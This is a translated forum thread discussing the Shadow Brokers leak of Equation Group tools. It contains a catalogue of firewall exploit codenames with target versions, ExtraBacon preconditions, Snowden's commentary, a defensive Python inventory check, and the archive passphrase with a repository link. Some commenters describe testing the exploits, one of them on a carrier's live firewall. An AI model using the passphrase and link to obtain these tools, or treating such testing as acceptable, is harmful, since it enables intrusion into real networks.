1212/DEHEX Converts hexadecimal strings to IP addresses and ports.
XTRACTPLEASING Extracts something from a file and produces a PCAP file as output.
NOPEN A post-exploitation shell consisting of a client and a server that encrypts data using RC6. The server is installed on the target machine.

Explanation of the exploit tool abbreviations (EQGRP-Auction-Files/Firewall/EXPLOITS/) (from: Analysis of the attack tools of the Equation Group (NSA-affiliated hacker group))

EGBL = EGREGIOUS BLUNDER (Fortigate firewall + HTTPD exploit (apparently 2006 CVE )
ELBA = ELIGIBLE BACHELOR
ELBO = ELIGIBLE BOMBSHELL (TOPSEC (天融信) firewall versions 3.3.005.057.1 to 3.3.010.024.1)
ELCA = ELIGIBLE CANDIDATE
ELCO = ELIGIBLE CONTESTANT
EPBA = EPIC BANANA
ESPL = ESCALATE PLOWMAN
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)
BANANAGLEE = Juniper Netscreen Devices
BARGLEE
BLATSTING
BUZZDIRECTION
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

Tools
BILLOCEAN Detects the firewall serial number

FOSHO A Python library for building the HTTP requests used in exploitation

BARICE Implant tool

DURABLENAPKIN Injects packets on the local network

BANANALIAR Implant tool

PANDAROCK Implant tool

SECONDDATE Packet injection against Cisco PIX devices

TEFLONDOOR A program that can self-destruct

1212/DEHEX Converts hexadecimal strings to the target server

XTRACTPLEASING Extracts something and produces a PCAP file

NOPEN Has a client and a server; encrypts data with RC6.


NSA hacking tools leaked: a disaster-level crisis for the networked world - Zhihu column

About a month ago a hacker team called the Shadow Brokers broke through the Equation Group's network defences and stole a large amount of internal information; at the same time the "Shadow Brokers" want the Equation Group to pay enough (asking 1 million US dollars in bitcoin) to buy back the stolen internal data, so it all looks like thieves robbing thieves. To prove they really had broken through the Equation Group's door, the Shadow Brokers then published part of the arsenal online.
The moment the data was published, network security people all over the world were stunned: this arsenal is so powerful it is like being shown a time machine, and that machine may be just one of many pieces of equipment in their lab, something they may have had many years ago, old gear sitting there gathering dust.


As someone mentioned, this is far more exciting than the Hacking Team stuff. Purely my personal judgement: an insider is very likely.



More than half a year has passed; now you know what the impact was.


Thanks for the invite.

===================Updated 10.08===========================

The so-called Shadow Broker has been caught: a comrade in his fifties, a friend of Snowden's. Many people earlier guessed whether this was the same crowd that hacked Hillary and the Democrats; it was not. The FBI was right, it really was an insider. His company is a US cyber-arms contractor. That 129m of unreleased content can never be obtained now.

While I'm at it, an update: the article I wrote the day after the Equation Group was exposed but never published:

Old article: The world's No. 1 APT group "Equation" got hacked! - 劍走偏鋒 - Zhihu column

===================Updated 8.20===========================

shotgun looked at the overall development using attack scope and the timeline as the axes.

I want to talk about the political impact. The US NSA should be quite on the back foot now. Bear in mind that the Equation Group's earlier intrusions and thefts were not only aimed at China and Russia; they included Europe, the UK, and many US allies! Now that this is confirmed, how does the US explain it to its allies?

"Actually we got in by accident and just grabbed a few things; a thief never leaves empty-handed." Obviously nobody would believe that!!

On the other hand, compared with the Hacking Team leak last time, the weight of this leak is certainly no less. It will reduce the disparity between countries' cyber arsenals.

For ordinary security enthusiasts it is a feast: look at their documentation and think about why they did things this way. Why go after firewalls. Why go after carriers. It all shows others' attack thinking. It is all growth.

Off topic

On September 25 last year, at the Xi-Ma meeting, both sides solemnly promised not to conduct hacking against each other's intellectual property or commercial hacking. Note that what is said here is "hacking aimed at intellectual property and commercial hacking". Struggles between states never stop. Nor can agreements be signed; honestly, nobody believes them even if signed. In this kind of thing it comes down to who is better, the "civilised battlefield".

The result: as soon as Xi returned home, the US reported that China had attacked five US companies and one US union and handed the stolen data to Chinalco, Baosteel and a nuclear power technology company. Of course the US side did not sit idle either; it went hard at China too.

In the game Civilization 5, countries can steal each other's technology. That is how the whole world progresses quickly. I am all for it.

==========================================================

Sorry, no time to reply. All my spare time is spent looking at this. Have to look, read and test.

Overall it is very impressive. A very strong team.

Tested two exploits, both succeeded, and there are plenty more tools.

This is far more exciting than the Hacking Team stuff.

Someone above said a deal was reached and the remaining files will not be released.

Impossible. If Russia did this, there is no way they will not release it. Sooner or later.

What does this remind us of? When attacking others, think about whether you can defend against others' attacks. If not, do not act rashly.

I will come back to write more later; off to do real work first.


Came back to dig up this thread after reading the news about the EternalBlue malware


https://medium.com/@msuiche/shadow-brokers-nsa-exploits-of-the-week-3f7e17bdc216#.cr5st27gs

EGBL = EGREGIOUS BLUNDER (Fortigate Firewall + HTTPD exploit (apparently 2006 CVE )

ELBA = ELIGIBLE BACHELOR

ELBO = ELIGIBLE BOMBSHELL (Chinese TOPSEC firewall versions 3.3.005.057.1 to 3.3.010.024.1)

ELCA = ELIGIBLE CANDIDATE

ELCO = ELIGIBLE CONTESTANT

EPBA = EPIC BANANA

ESPL = ESCALATE PLOWMAN

EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)

BANANAGLEE = Juniper Netscreen Devices

BARGLEE

BLATSTING

BUZZDIRECTION

SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)

BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

EquationGroup Tool Leak

The requirements for the ExtraBacon exploit are that you have SNMP read access to the firewall, as well as access to either telnet or SSH. The ASA must be running 8.x, up to 8.4(4), and is said to have the possibility to crash the firewall if something goes wrong.

Once the exploit is successful, the attacker will be able to SSH to or telnet to (depending on what protocol is setup on the FW) without needing to enter credentials. If an enable password is set, this will still need to be a barrier for managing the firewall, as the exploit does not appear to disable it.
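The two paragraphs above give the preconditions for ExtraBacon as three separate requirements: an 8.x release up to 8.4(4), SNMP read access, and reachable telnet or SSH management. As an added example for this thread, not code from the leak, the linked article or this answer, the Python below evaluates a constructed ASA inventory against exactly those three conditions; its version parser accepts both the 8.4(4) notation used here and the compact 844 form the catalogue earlier on the page uses for the same releases. Hostnames, record field names and function names are all constructed for the demonstration.

```python
"""Flag ASA devices in an inventory that meet every precondition the answer
lists for ExtraBacon: an 8.x release no newer than 8.4(4), SNMP readable
from an untrusted network, and telnet or SSH management reachable.  Added
example for this thread, not code from the leak, the cited article or the
answer; the inventory records, their field names and the function names
are all constructed for the demonstration."""
import re

# Inclusive upper bound given in the answer: "8.x, up to 8.4(4)".
MAX_VULNERABLE = (8, 4, 4)


def parse_asa_version(text):
    """Return (major, minor, maintenance) for "8.4(4)", "8.4.4" or the
    compact "844" form the leaked catalogue uses for the same release."""
    text = text.strip()
    dotted = re.fullmatch(r"(\d+)\.(\d+)(?:[.(](\d+)\)?)?", text)
    if dotted:
        return tuple(int(part or 0) for part in dotted.groups())
    if re.fullmatch(r"\d{3}", text):
        return tuple(int(digit) for digit in text)
    raise ValueError("unrecognised ASA version: %r" % text)


def version_in_range(version):
    """True for any 8.x release not newer than 8.4(4)."""
    return version[0] == 8 and version <= MAX_VULNERABLE


def assess(device):
    """List the preconditions a device satisfies; all three together mean
    the exploit's requirements are met as the answer describes them."""
    findings = []
    if version_in_range(parse_asa_version(device["version"])):
        findings.append("vulnerable-version")
    if device.get("snmp_ro_from_untrusted"):
        findings.append("snmp-readable")
    if set(device.get("mgmt_protocols", ())) & {"ssh", "telnet"}:
        findings.append("remote-management")
    return findings


def exposed_devices(inventory):
    """Hostnames for which every precondition holds."""
    return [d["host"] for d in inventory if len(assess(d)) == 3]


# Constructed inventory; hostnames and field names are this example's own.
INVENTORY = [
    {"host": "fw-edge-1", "version": "8.4(4)", "snmp_ro_from_untrusted": True, "mgmt_protocols": {"ssh"}},
    {"host": "fw-edge-2", "version": "8.4(5)", "snmp_ro_from_untrusted": True, "mgmt_protocols": {"ssh"}},
    {"host": "fw-lab", "version": "832", "snmp_ro_from_untrusted": False, "mgmt_protocols": {"telnet"}},
    {"host": "fw-dc", "version": "9.1(7)", "snmp_ro_from_untrusted": True, "mgmt_protocols": {"ssh", "telnet"}},
    {"host": "fw-branch", "version": "8.2(5)", "snmp_ro_from_untrusted": True, "mgmt_protocols": {"telnet"}},
]

if __name__ == "__main__":
    for device in INVENTORY:
        print(device["host"], assess(device))
    print("exposed:", exposed_devices(INVENTORY))
```

A device that trips all three findings is the one to fix first: upgrade it, restrict SNMP to the management network, and keep management protocols off untrusted interfaces. Devices that trip only one or two are still worth attention, since the missing condition may simply be something the inventory does not record. As the answer notes, an enable password still stands between an attacker and the configuration after a successful exploit, so this check is a starting point rather than a complete risk picture.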


If you have forgotten the password you can change it yourself.

Notes on firewall password recovery


Those who are baffled after downloading the files can read this https://consen.github.io/2016/08/18/GnuPG-practice/


Today's biggest scoop: a hacker group tracked the traffic of the Equation Group (the creators of Stuxnet, Duqu, Flame and other programs built specifically for nation-state APT groups), broke into the Equation Group's network and obtained a large number of the group's programs. The hackers released part of the Equation Group's programs (mainly the firewall part; by the look of it, including implants and backdoors for Juniper, Cisco, a certain H and a certain T), and at the same time held an auction: whoever offers the most bitcoin gets the password to the other, higher-value archive (presumably backdoors for operating systems and the like).

Link: GitHub - theshadowbrokers/EQGRP-AUCTION


I am just nature's porter (reposting): Snowden explains the Shadow Brokers/Equation Group/NSA hack / Boing Boing

Edward Snowden posted a series of tweets explaining this affair for laypeople, and some media merged the tweets together. I think it is written quite clearly.

The underlined parts are the reposter's highlights; the original has no underlining.

Techdirt has assembled Snowden's tweets in handy form:

The hack of an NSA malware staging server is not unprecedented, but the publication of the take is. Here's what you need to know:

NSA traces and targets malware C2 servers in a practice called Counter Computer Network Exploitation, or CCNE. So do our rivals. NSA is often lurking undetected for years on the C2 and ORBs (proxy hops) of state hackers. This is how we follow their operations. This is how we steal their rivals' hacking tools and reverse-engineer them to create "fingerprints" to help us detect them in the future.

Here"s where it gets interesting: the NSA is not made of magic. Our rivals do the same thing to us -- and occasionally succeed. Knowing this, NSA"s hackers (TAO) are told not to leave their hack tools ("binaries") on the server after an op. But people get lazy.

What"s new? NSA malware staging servers getting hacked by a rival is not new. A rival publicly demonstrating they have done so is.

Why did they do it? No one knows, but I suspect this is more diplomacy than intelligence, related to the escalation around the DNC hack. Circumstantial evidence and conventional wisdom indicates Russian responsibility. Here's why that is significant: This leak is likely a warning that someone can prove US responsibility for any attacks that originated from this malware server. That could have significant foreign policy consequences. Particularly if any of those operations targeted US allies. Particularly if any of those operations targeted elections. Accordingly, this may be an effort to influence the calculus of decision-makers wondering how sharply to respond to the DNC hacks.

TL;DR: This leak looks like a somebody sending a message that an escalation in the attribution game could get messy fast.

Bonus: When I came forward, NSA would have migrated offensive operations to new servers as a precaution - it's cheap and easy. So? So... The undetected hacker squatting on this NSA server lost access in June 2013. Rare public data point on the positive results of the leak.

You"re welcome, @NSAGov. Lots of love.


The password for the other file was released a month ago...

CrDj"(;Va.*NdlnzB9M?@K2)#>deB7mN

https://github.com/x0rz/EQGRP


Learning has no end; having fun is the most fun thing of all.


Another big one

Intelligence agencies shaken up from top to bottom

Global cyber offence and defence capabilities go up another level, further narrowing the gap

Will something even bigger happen within three to five years? Hope everyone stays safe


Actually, is it necessary to attack the firewall during a penetration? It is overkill, and most importantly it requires SNMP read permission plus telnet or SSH login; very few devices expose these three to the public internet. So the publicly released free material has little practical use after all; looking for the way to unpack the auction archive!

Could only experiment on the carrier's ASA; crashed it and couldn't get online myself...(T_T)

Also, the Huawei leak is VRP3.3, which is damn near a ten-year-old version; without a leak for VRP5 or later what use is it....


The state should introduce a policy forcing the education sector to use Linux; it is because these schools all damn well use Windows that today's students all use Windows and generation after generation goes off to work on Windows.

